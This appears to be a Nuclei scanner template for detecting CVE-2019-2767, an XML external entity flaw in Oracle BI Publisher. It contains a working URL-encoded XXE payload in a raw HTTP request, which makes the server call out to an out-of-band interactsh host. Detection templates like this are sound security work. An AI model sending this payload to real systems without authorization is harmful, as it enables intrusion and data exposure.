40 lines
1.8 KiB
YAML
40 lines
1.8 KiB
YAML
id: CVE-2019-2767
|
|
|
|
info:
|
|
name: Oracle Business Intelligence Publisher - XML External Entity Injection
|
|
author: madrobot
|
|
severity: high
|
|
description: Oracle Business Intelligence Publisher is vulnerable to an XML external entity injection attack. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise BI Publisher.
|
|
impact: |
|
|
An attacker can exploit this vulnerability to gain unauthorized access to sensitive information or disrupt the availability of the system.
|
|
remediation: |
|
|
Apply the latest security patches provided by Oracle to fix this vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/46729
|
|
- http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-2767
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
cvss-score: 7.2
|
|
cve-id: CVE-2019-2767
|
|
epss-score: 0.14972
|
|
epss-percentile: 0.95282
|
|
cpe: cpe:2.3:a:oracle:bi_publisher:11.1.1.9.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: oracle
|
|
product: bi_publisher
|
|
tags: edb,cve,cve2019,oracle,xxe,oast
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|
|
# digest: 4b0a00483046022100bb5ab55e12b9f0a1e0496c8434384dca1bdc8b4059326d4492ab75544014c3ae022100838e2c11285f0b98c9c0e51f533de8c05a6b08d325508ae8a16fd484d061e89c:922c64590222798bb761d5b6d8e72950 |